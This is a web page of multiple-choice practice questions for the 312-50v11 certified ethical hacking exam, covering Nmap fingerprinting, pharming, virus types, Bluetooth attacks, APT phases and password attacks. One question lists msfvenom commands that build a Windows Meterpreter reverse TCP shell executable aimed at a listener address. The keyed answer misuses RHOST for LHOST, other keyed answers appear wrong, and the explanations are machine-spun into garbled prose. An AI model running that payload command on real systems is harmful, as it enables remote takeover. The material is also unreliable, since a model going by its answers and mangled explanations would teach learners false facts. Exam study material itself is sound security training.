312-50v11 Practice Test Questions

519 Questions


A penetration tester is conducting a port scan on a specific host. The tester found several
ports opened that were confusing in concluding the Operating System (OS) version
installed. Considering that NMAP result below, which of the following is likely to be installed
on the target machine by the OS? Starting NMAP 5.21 at 2011-03-15 11:06 NMAP scan
report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT
STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbiosssn
515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:8


A.

The host is likely a Linux machine.


B.

The host is likely a printer.


C.

The host is likely a router.


D.

The host is likely a Windows machine.





B.
  

The host is likely a printer.



Attacker Steve targeted an organization's network with the aim of redirecting the company's
web traffic to another malicious website. To achieve this goal, Steve performed DNS cache
poisoning by exploiting the vulnerabilities In the DNS server software and modified the
original IP address of the target website to that of a fake website. What is the technique
employed by Steve to gather information for identity theft?


A.

Pretexting


B.

Pharming


C.

Wardriving


D.

Skimming





B.
  

Pharming



Explanation: A pharming attacker tries to send a web site’s traffic to a faux website
controlled by the offender, typically for the aim of collection sensitive data from victims or
putting in malware on their machines. Attacker tend to specialize in making look-alike
ecommerce and digital banking websites to reap credentials and payment card data.
Though they share similar goals, pharming uses a special technique from phishing.
“Pharming attacker are targeted on manipulating a system, instead of tricking people into
reaching to a dangerous web site,” explains David Emm, principal security man of science
at Kaspersky. “When either a phishing or pharming attacker is completed by a criminal,
they need a similar driving issue to induce victims onto a corrupt location, however the
mechanisms during which this is often undertaken are completely different.”

Which of the following program infects the system boot sector and the executable files at
the same time?


A.

Polymorphic virus


B.

Stealth virus


C.

Multipartite Virus


D.

Macro virus





C.
  

Multipartite Virus



what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?


A.

msfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 -
f.exe > shell.exe


B.

msfvenom -p windows/meterpreier/feversetcp LHOST=10.10.10.30 LP0RT=4444-f c


C.

msfvenom -p windows/rneterpreter/reverse_tcpRMOST=i0.i 0.10.30 LPORT =4444-fc


D.

msfvenom -p wlndows/meterpreter/reverse.tcp lhost=io.i 0.1030 lport=4444 -f exe >
shell.exe





A.
  

msfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 -
f.exe > shell.exe



What is the purpose of DNS AAAA record?


A.

Authorization, Authentication and Auditing record


B.

Address prefix record


C.

Address database record


D.

IPv6 address resolution record





D.
  

IPv6 address resolution record



Which of the following is assured by the use of a hash?


A.

Authentication


B.

Confidentiality


C.

Availability


D.

Integrity





D.
  

Integrity



Which of the following is not a Bluetooth attack? 


A.

Bluedriving


B.

Bluesmacking


C.

Bluejacking


D.

Bluesnarfing





A.
  

Bluedriving



When analyzing the IDS logs, the system administrator noticed an alert was logged when
the external router was accessed from the administrator’s Computer to update the router configuration. What type of an alert is this?


A.

False negative


B.

True negative


C.

True positive


D.

False positive





D.
  

False positive



Harry. a professional hacker, targets the IT infrastructure of an organization. After
preparing for the attack, he attempts to enter the target network using techniques such as
sending spear-phishing emails and exploiting vulnerabilities on publicly available servers.
Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing?


A.

Preparation


B.

Cleanup


C.

Persistence


D.

initial intrusion





D.
  

initial intrusion



Explanation:
After the attacker completes preparations, subsequent step is an effort to realize an edge
within the target’s environment. a particularly common entry tactic is that the use of
spearphishing emails containing an internet link or attachment. Email links usually cause
sites where the target’s browser and related software are subjected to varied exploit

Johnson, an attacker, performed online research for the contact details of reputed
cybersecurity firms. He found the contact number of sibertech.org and dialed the number,
claiming himself to represent a technical support team from a vendor. He warned that a
specific server is about to be compromised and requested sibertech.org to follow the
provided instructions. Consequently, he prompted the victim to execute unusual commands
and install malicious files, which were then used to collect and pass critical Information to
Johnson's machine. What is the social engineering technique Steve employed in the above
scenario?


A.

Quid pro quo


B.

Diversion theft


C.

Elicitatiom


D.

Phishing





B.
  

Diversion theft



In an internal security audit, the white hat hacker gains control over a user account and
attempts to acquire access to another account's confidential files and information. How can
he achieve this?


A.

Privilege Escalation


B.

Shoulder-Surfing


C.

Hacking Active Directory


D.

Port Scanning





A.
  

Privilege Escalation



Ricardo has discovered the username for an application in his targets environment. As he has a limited amount of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a list and then feeds that list as an argument into his password-cracking application, what type of attack is Ricardo performing?


A.

Known plaintext


B.

Password spraying


C.

Brute force


D.

Dictionary





C.
  

Brute force



Explanation:
A brute force attack could be a popular cracking method: by some accounts, brute force
attacks accounted for five% has a of confirmed security breaches. A brute force attack
involves ‘guessing’ username and passwords to achieve unauthorized access to a system.
Brute force could be a easy attack methodology and encompasses a high success
rate.Some attackers use applications and scripts as brute force tools. These tools attempt
various parole combos to bypass authentication processes. In different cases, attackers try
and access net applications by sorting out the correct session ID. offender motivation might
embody stealing data, infecting sites with malware, or disrupting service.While some
attackers still perform brute force attacks manually, nowadays most brute force attacks
nowadays area unit performed by bots. Attackers have lists of ordinarily used credentials,
or real user credentials, obtained via security breaches or the dark net. Bots consistently
attack websites and take a look at these lists of credentials, and apprize the offender after
they gain access.
Types of Brute Force Attacks• Simple brute force attack—uses a scientific approach to
‘guess’ that doesn’t believe outside logic.• Hybrid brute force attacks—starts from external
logic to see that parole variation could also be presumably to succeed, then continues with
the easy approach to undertake several potential variations.• Dictionary attacks—guesses
username or passwords employing a wordbook of potential strings or phrases.• Rainbow
table attacks—a rainbow table could be a precomputed table for reversing cryptologic hash
functions. It may be wont to guess a perform up to a precise length consisting of a
restricted set of characters.• Reverse brute force attack—uses a typical parole or
assortment of passwords against several potential username . Targets a network of users
that the attackers have antecedently obtained knowledge.• Credential stuffing—uses
previously-known password-username pairs, attempting them against multiple websites.
Exploits the actual fact that several users have an equivalent username and parole across
totally different systems.
Hydra and different widespread Brute Force Attack ToolsSecurity analysts use the THCHydra
tool to spot vulnerabilities in shopper systems. Hydra quickly runs through an
outsized range of parole combos, either easy brute force or dictionary-based. It will attack
quite fifty protocols and multiple operational systems. Hydra is an open platform; the safety
community and attackers perpetually develop new modules.
Other high brute force tools are:• Aircrack-ng—can be used on Windows, Linux, iOS, and
golem. It uses a wordbook of wide used passwords to breach wireless networks.• John the
Ripper—runs on fifteen totally different platforms as well as UNIX operating system
Windows, and OpenVMS. Tries all potential combos employing a dictionary of potential
passwords.• L0phtCrack—a tool for cracking Windows passwords. It uses rainbow tables,
dictionaries, and digital computer algorithms.• Hashcat—works on Windows, Linux, and
Mac OS. will perform easy brute force, rule-based, and hybrid attacks.• DaveGrohl—an
open-source tool for cracking mac OS. may be distributed across multiple computers.•
Ncrack—a tool for cracking network authentication. It may be used on Windows, Linux, and
BSD.


Page 12 out of 44 Pages
Previous